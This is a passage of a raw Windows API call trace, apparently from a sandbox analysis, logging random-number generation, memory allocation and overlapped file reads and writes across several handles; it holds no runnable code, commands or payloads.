_Size=0x4) returned 0x77d800 [0110.326] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.326] free (_Block=0x77d800) [0110.326] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.327] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.327] free (_Block=0x1fa4848) [0110.327] free (_Block=0x2071818) [0110.327] free (_Block=0x77d908) [0110.327] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.327] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.341] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x39e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0110.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0110.357] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0110.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.241] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0112.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0112.254] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.254] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.254] free (_Block=0x77d7a8) [0112.254] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.254] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.255] free (_Block=0x2071c20) [0112.255] free (_Block=0x2071d30) [0112.255] free (_Block=0x77d8b0) [0112.255] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0112.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.260] CloseHandle (hObject=0x81c) returned 1 [0112.264] free (_Block=0x3ef0008) [0112.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.272] CloseHandle (hObject=0x3ac) returned 1 [0112.274] free (_Block=0x3d70450) [0112.274] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.285] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xe04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.490] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x8b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0112.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0112.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0112.494] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.494] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.494] free (_Block=0x77d7a8) [0112.494] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.494] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.495] free (_Block=0x2071c20) [0112.495] free (_Block=0x2071d30) [0112.495] free (_Block=0x77d8b0) [0112.495] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.495] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.525] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.528] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x7d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.614] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0112.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.628] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0112.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.646] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.663] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0112.663] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.678] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x70c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0112.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.691] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.691] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0112.695] ReadFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xed4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.223] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.223] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0113.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0113.238] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.238] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.238] free (_Block=0x77d7a8) [0113.238] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.238] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.238] free (_Block=0x2071c20) [0113.238] free (_Block=0x2071d30) [0113.238] free (_Block=0x77d8b0) [0113.239] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.245] CloseHandle (hObject=0x81c) returned 1 [0113.248] free (_Block=0x3e70008) [0113.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.254] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2174, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0113.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.286] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x6e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.286] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.325] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.330] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.332] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0113.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.359] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.359] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0113.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0113.360] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.360] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.360] free (_Block=0x77d7a8) [0113.360] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.360] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.361] free (_Block=0x2071c20) [0113.361] free (_Block=0x2071d30) [0113.361] free (_Block=0x77d8b0) [0113.361] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.361] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0113.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0113.384] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.385] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.385] free (_Block=0x77d7a8) [0113.385] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.385] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.385] free (_Block=0x2071c20) [0113.385] free (_Block=0x2071d30) [0113.385] free (_Block=0x77d8b0) [0113.385] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.392] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x228, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.408] CloseHandle (hObject=0x340) returned 1 [0113.411] free (_Block=0x3ef0008) [0113.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.435] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.492] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0113.500] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0113.500] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.500] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.501] free (_Block=0x77d7a8) [0113.501] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.501] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.501] free (_Block=0x2071c20) [0113.501] free (_Block=0x2071d30) [0113.501] free (_Block=0x77d8b0) [0113.501] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0113.506] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x0, 